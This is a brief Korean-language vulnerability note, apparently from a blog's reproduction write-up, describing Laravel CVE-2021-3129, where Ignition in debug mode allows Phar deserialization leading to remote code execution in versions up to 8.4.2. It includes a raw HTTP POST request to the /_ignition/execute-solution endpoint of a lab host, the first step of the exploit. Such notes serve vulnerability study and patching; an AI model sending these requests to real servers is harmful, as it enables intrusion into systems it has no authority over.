
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
Laravel에서 Debug 모드가 활성화된 경우, Laravel에 포함된 Ignition 구성 요소가 file_get_contents() 및 file_put_contents() 함수를 안전하지 않게 사용하여 공격자가 악의적인 요청을 보내고 악성 Log 파일을 구성하는 등의 방식으로 Phar 역직렬화를 트리거할 수 있으며, 궁극적으로 원격 코드 실행으로 이어집니다.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug mode RCE 재현 | tyskillのBlog